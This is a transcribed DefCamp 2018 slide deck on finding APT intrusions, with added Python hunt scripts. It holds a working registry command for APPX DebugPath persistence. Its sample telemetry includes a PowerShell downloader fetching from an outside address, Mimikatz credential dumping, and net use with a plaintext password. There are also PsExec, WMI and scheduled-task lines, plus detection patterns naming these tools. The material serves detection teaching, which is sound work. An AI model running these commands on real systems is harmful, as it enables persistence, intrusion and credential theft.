Classification: //Secureworks/Public Use:© SecureWorks, Inc.

Slide 1: Catch Me If You Can – Finding APTs in your network
DefCamp, November 2018
Adrian Tudor, Leo Neagu

Slide 2: What is an APT?
• An Advanced Persistent Threat (APT) is a cyberattack designed to “fly under the radar”: it is built to evade signature-based AV/IDS, so those tools will typically not alert on it

Slide 3: What is an APT? Key elements of an APT attack
• A targeted cyberattack in which an intruder gains access to a network
• The intruder remains undetected for an extended period of time
• Traditionally associated with nation-state actors
• In the last few years, the tools and techniques used by some APT actors have also been adopted by various cybercriminal groups
• Example: the 2010 malware that targeted SCADA systems and is believed to be responsible for substantial damage to Iran's nuclear program (Stuxnet)

Slide 4: APT attack mechanism
• Focus on these kill-chain phases:
  • Delivery
  • Exploitation
  • Installation
  • Command and Control
  • Actions on Objectives

Slide 5: APT attack mechanism

Slide 6: APT attack mechanism – Delivery
• Vector of compromise

Slide 7: APT Exploitation and Installation
• Exploitation with malicious links

Slide 8: APT Exploitation and Installation

Slide 9: APT Exploitation and Installation
• Quasar RAT – easy to use/deploy
• NetWire malware

Slide 10: APT Exploitation and Installation
• Quasar RAT – easy to use/deploy – demo

Slide 11: APT Installation

Slide 12: APT Installation – Persistence
- Creating services with legitimate-sounding names
- Scheduled tasks
- Malware installed as a Microsoft Office add-in: when MS Word starts, the malware is executed
- DLL hijacking
- and many more

Slide 13: APT Installation – Persistence
The persistence techniques catalogued by MITRE ATT&CK (Persistence tactic, as listed in 2018):
- .bash_profile and .bashrc
- Accessibility Features
- Account Manipulation
- AppCert DLLs
- AppInit DLLs
- Application Shimming
- Authentication Package
- BITS Jobs
- Bootkit
- Browser Extensions
- Change Default File Association
- Component Firmware
- Component Object Model Hijacking
- Create Account
- DLL Search Order Hijacking
- Dylib Hijacking
- External Remote Services
- File System Permissions Weakness
- Hidden Files and Directories
- Hooking
- Hypervisor
- Image File Execution Options Injection
- Kernel Modules and Extensions
- Launch Agent
- Launch Daemon
- Launchctl
- LC_LOAD_DYLIB Addition
- Local Job Scheduling
- Login Item
- Logon Scripts
- LSASS Driver
- Modify Existing Service
- Netsh Helper DLL
- New Service
- Office Application Startup
- Path Interception
- Plist Modification
- Port Knocking
- Port Monitors
- Rc.common
- Re-opened Applications
- Redundant Access
- Registry Run Keys / Startup Folder
- Scheduled Task
- Screensaver
- Security Support Provider
- Service Registry Permissions Weakness
- Setuid and Setgid
- Shortcut Modification
- SIP and Trust Provider Hijacking
- Startup Items
- System Firmware
- Time Providers
- Trap
- Valid Accounts
- Web Shell
- Windows Management Instrumentation Event Subscription
- Winlogon Helper DLL
You can find more detailed information on https://attack.mitre.org

Slide 14: APT Installation – Persistence
• Persistence using Universal Windows Platform apps (APPX)

Slide 15: APT Installation – Persistence
Persistence using Universal Windows Platform apps (APPX): persistence using the People app. The DebugPath value under the package's DebugInformation key names an executable that Windows launches when the app is activated, and because the key lives under HKCU no administrative rights are needed to set it:

reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Users\IEUser\AppData\Roaming\SubDir\Client.exe"

Reference: Oddvar Moe, https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/
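A hunt for this technique over endpoint telemetry, written for this page as an added example (it is neither the authors' nor Oddvar Moe's code). It runs over a few constructed Sysmon Event ID 13 (registry value set) records embedded in the block; the SID, the package other than Microsoft.People, the writer images and the list of user-writable path hints are assumptions to tune for your environment:

```python
import re

# Sysmon Event ID 13 = "registry value set". The DebugPath value under
# HKCU\Software\Classes\ActivatableClasses\Package\<package>\DebugInformation\<app id>
# is the persistence location shown on the slide. Sysmon records HKCU as HKU\<SID>.
DEBUGPATH_RE = re.compile(
    r"\\ActivatableClasses\\Package\\(?P<package>[^\\]+)\\DebugInformation\\[^\\]+\\DebugPath$",
    re.IGNORECASE,
)

# Directory fragments a non-admin user can write to. Assumption: extend for your environment.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")

# Constructed Sysmon Event ID 13 records, not real telemetry. The first is the slide's
# reg add command as Sysmon would log it; the other two are assumed benign activity.
SAMPLE_EVENTS = [
    {
        "EventID": 13,
        "Image": "C:\\Windows\\System32\\reg.exe",
        "TargetObject": "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001\\Software\\Classes"
                        "\\ActivatableClasses\\Package\\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe"
                        "\\DebugInformation\\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca"
                        "\\DebugPath",
        "Details": "C:\\Users\\IEUser\\AppData\\Roaming\\SubDir\\Client.exe",
    },
    {   # a (hypothetical) developer tool registering a debugger for its own package
        "EventID": 13,
        "Image": "C:\\Program Files\\Contoso Tools\\devtool.exe",
        "TargetObject": "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001\\Software\\Classes"
                        "\\ActivatableClasses\\Package\\Contoso.App_1.0.0.0_x64__abcdef123456"
                        "\\DebugInformation\\App\\DebugPath",
        "Details": "C:\\Program Files\\Contoso Tools\\debugger.exe",
    },
    {   # ordinary Run-key write; must not match this hunt
        "EventID": 13,
        "Image": "C:\\Windows\\explorer.exe",
        "TargetObject": "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001"
                        "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
        "Details": "C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background",
    },
]


def hunt_debugpath(events):
    """One finding per DebugPath value set; 'high' when the payload sits in a user-writable path."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        match = DEBUGPATH_RE.search(ev.get("TargetObject", ""))
        if not match:
            continue
        payload = ev.get("Details", "")
        in_user_dir = any(hint in payload.lower() for hint in USER_WRITABLE_HINTS)
        findings.append({
            "package": match.group("package"),
            "payload": payload,
            "writer": ev.get("Image", ""),
            "severity": "high" if in_user_dir else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in hunt_debugpath(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['package']} -> {f['payload']} (set by {f['writer']})")
```

Every DebugPath write is reported, because on a machine without developer tooling the value should not exist at all; the severity only rises when the payload lives where an unprivileged user can drop a file, which is the pattern in the slide's command. On a live host the same question can be asked with `reg query HKCU\Software\Classes\ActivatableClasses\Package /s /v DebugPath`.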

Slide 16: APT Lateral movement
Moving laterally inside the environment, compromising additional targets and getting closer to high-value assets using different tools and techniques:
- Enumerate credentials from memory using commonly available password dumpers (Mimikatz)
- net.exe to connect to network shares using “net use” commands with compromised credentials
- Spread through the local network using PsExec
- Windows Management Instrumentation (WMI) to interact with local and remote systems

Slide 17: How can I tell I’m targeted?
- Recognizing an APT attack early in the kill chain is a tough job
- The attackers prefer to work slowly, blending in with regular network activity and using tools already available in the environment (PowerShell, WMI, net.exe etc.)

Slide 18: Data exfiltration: too late to detect?
- Large outbound network traffic should raise questions, especially if the amount transferred is outside the regular trendline
- Quite often APT attacks are detected only after the gathered data has already been exfiltrated, sometimes months later

Slide 19: The reason behind the spike
- A web shell (China Chopper) present on an IIS server
- A password-protected RAR archive was exfiltrated
- Further analysis of memory revealed the data being staged for exfiltration
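A trendline check of the kind the two slides above describe, written for this page as an added example (not the authors' code). It runs over constructed daily outbound byte totals for two hosts embedded in the block; the host names, the numbers and the tuning knobs (minimum history, MAD multiplier, ratio floor) are assumptions. It uses a median/MAD baseline rather than mean/standard deviation so that the spike itself does not inflate the baseline once it is in the history:

```python
from collections import defaultdict
from statistics import median

MB = 1_000_000

# Constructed daily outbound byte totals (internal host -> Internet), as a flow collector or
# proxy would summarise them. Not real data. WEB01 stands in for the IIS server on the slide:
# thirteen ordinary days, then a 9.8 GB day (the archive leaving). WS07 is a workstation with
# one moderately large day that should not page anyone.
WEB01_MB = [410, 395, 420, 405, 398, 412, 401, 417, 390, 408, 399, 415, 403, 9800]
WS07_MB = [52, 48, 61, 55, 49, 58, 50, 53, 47, 60, 54, 51, 120, 56]
DAILY_OUTBOUND = [
    (host, f"2018-10-{day:02d}", mb * MB)
    for host, values in (("WEB01", WEB01_MB), ("WS07", WS07_MB))
    for day, mb in enumerate(values, start=1)
]


def hunt_outbound_spikes(records, min_history=7, k=6.0, min_ratio=3.0):
    """Flag days whose outbound volume is far above the host's own history.

    records: iterable of (host, ISO date, bytes). A day is flagged when it exceeds
    median + k * scaled MAD of all earlier days AND is at least min_ratio times the median;
    the ratio floor stops near-constant hosts (tiny MAD) from alerting on small bumps.
    """
    per_host = defaultdict(list)
    for host, day, nbytes in records:
        per_host[host].append((day, nbytes))

    findings = []
    for host, series in per_host.items():
        series.sort()  # ISO dates sort chronologically as strings
        for i in range(min_history, len(series)):
            history = [b for _, b in series[:i]]
            day, nbytes = series[i]
            med = median(history)
            if med <= 0:
                continue
            mad = median([abs(b - med) for b in history]) * 1.4826  # scaled MAD ~ sigma
            threshold = med + k * mad
            if nbytes > threshold and nbytes > min_ratio * med:
                findings.append({
                    "host": host,
                    "date": day,
                    "bytes": nbytes,
                    "baseline": med,
                    "ratio": nbytes / med,
                })
    return findings


if __name__ == "__main__":
    for f in hunt_outbound_spikes(DAILY_OUTBOUND):
        print(f"{f['host']} {f['date']}: {f['bytes'] / MB:.0f} MB, "
              f"{f['ratio']:.1f}x its usual {f['baseline'] / MB:.0f} MB")
```

With these knobs WEB01's last day is reported at roughly 24 times its baseline, while WS07's 120 MB day (about 2.3 times its baseline) stays below the ratio floor. In practice the same check is worth running on hourly buckets and per destination, since an attacker who knows the daily total is watched can spread the transfer over a night.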

Slide 20: Are you ready to detect an APT?
Assess your current state
  • Identify your assets
  • Know your vulnerabilities
Know your enemies
  • Threat Intelligence feeds
  • Tools, tactics and procedures used by threat actors
Design and implement your vision
  • Multi-layered endpoint & network protection
  • Threat Hunting

Slide 21: Let’s go Threat Hunting – look for hidden threats
Hunt cycle: Start the hunt → Refine the hunt → Response
Hunt leads to start from:
- Large unexpected data flows
- Remote access via RDP
- Scheduled tasks
- Phishing campaigns
- Encoded PowerShell commands
- Net.exe use
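The lateral-movement tools from slide 16 and the command-line hunt leads on this slide (encoded PowerShell, net.exe use, scheduled tasks) come down to the same data source: process-creation events. The block below is an added example written for this page (not the authors' code) that runs a handful of such hunts over constructed Sysmon Event ID 1 style records embedded in the block. Host names, users, paths, the credential in the net use line and the 203.0.113.7 address are made up; the keyword lists and regular expressions are assumptions to tune:

```python
import base64
import re


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_ps; returns '' when the argument is not valid base64."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    except ValueError:
        return ""
    return raw.decode("utf-16le", errors="replace")


# powershell.exe accepts -e, -ec, -en, -enc and -EncodedCommand; -ExecutionPolicy must not match.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
NET_USE_CREDS_RE = re.compile(r"\bnet1?(?:\.exe)?\s+use\s+.*?/user:", re.IGNORECASE)
WMI_REMOTE_RE = re.compile(r"\bwmic(?:\.exe)?\s+.*?/node:.*?process\s+call\s+create", re.IGNORECASE)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)
MIMIKATZ_RE = re.compile(r"\b(?:sekurlsa|lsadump|kerberos|privilege)::", re.IGNORECASE)  # module::command syntax
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}  # client binaries and the service dropped on the target
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "net.webclient")

# Constructed process-creation records, not real telemetry. The encoded command is built with
# encode_ps so the sample is exactly what a downloader one-liner looks like on the command line.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_PROCESSES = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": _PS,
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')")},
    {"host": "WS01", "user": "CORP\\jdoe", "image": _PS,
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},  # benign
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\m.exe",
     "cmdline": "m.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net use \\\\FS01\\C$ /user:CORP\\svc_backup Summer2018!"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net use H: \\\\FS01\\home"},  # benign drive mapping, no explicit credentials
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\PsExec.exe",
     "cmdline": "PsExec.exe \\\\FS01 -s cmd.exe /c whoami"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic /node:FS01 process call create \"cmd.exe /c whoami\""},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /tn \"Windows Update Check\" /tr C:\\ProgramData\\upd.exe /sc onlogon"},
]


def _finding(ev, rule, severity, evidence):
    return {"host": ev["host"], "user": ev["user"], "rule": rule, "severity": severity, "evidence": evidence}


def hunt_processes(events):
    """Apply each hunt to every record; one record can yield several findings."""
    findings = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        image_name = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        enc = ENCODED_RE.search(cmd)
        if enc:  # decode so the analyst sees the script, not a blob
            decoded = decode_encoded_command(enc.group(1))
            severity = "high" if any(k in decoded.lower() for k in SUSPICIOUS_PS) else "medium"
            findings.append(_finding(ev, "encoded-powershell", severity, decoded))
        if MIMIKATZ_RE.search(cmd):
            findings.append(_finding(ev, "credential-dumping", "high", cmd))
        if NET_USE_CREDS_RE.search(cmd):
            findings.append(_finding(ev, "net-use-explicit-creds", "medium", cmd))
        if image_name in PSEXEC_IMAGES:
            findings.append(_finding(ev, "psexec", "medium", cmd))
        if WMI_REMOTE_RE.search(cmd):
            findings.append(_finding(ev, "wmi-remote-exec", "high", cmd))
        if SCHTASKS_CREATE_RE.search(cmd):
            findings.append(_finding(ev, "scheduled-task-created", "medium", cmd))
    return findings


if __name__ == "__main__":
    for f in hunt_processes(SAMPLE_PROCESSES):
        print(f"[{f['severity']}] {f['host']} {f['user']} {f['rule']}: {f['evidence'][:80]}")
```

Each rule is deliberately noisy on its own: administrators do run `net use` with credentials and create scheduled tasks. The value comes from the combination on one host and user within a short window, which is how the slide's "refine the hunt" step turns a list of leads into an incident. Note that `net use` with `/user:` puts the password on the command line, so the same event that reveals the technique also reveals which credential to reset.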

Slide 22: QUESTIONS? THANK YOU!
